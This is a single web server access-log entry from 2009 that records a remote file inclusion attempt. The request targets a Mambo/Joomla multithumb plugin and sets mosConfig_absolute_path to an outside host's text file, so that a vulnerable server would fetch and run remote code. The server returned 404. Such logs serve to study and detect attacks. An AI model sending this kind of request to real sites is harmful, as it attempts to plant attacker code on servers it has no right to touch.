61.78.62.84 - - [01/Jul/2009:23:57:34 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
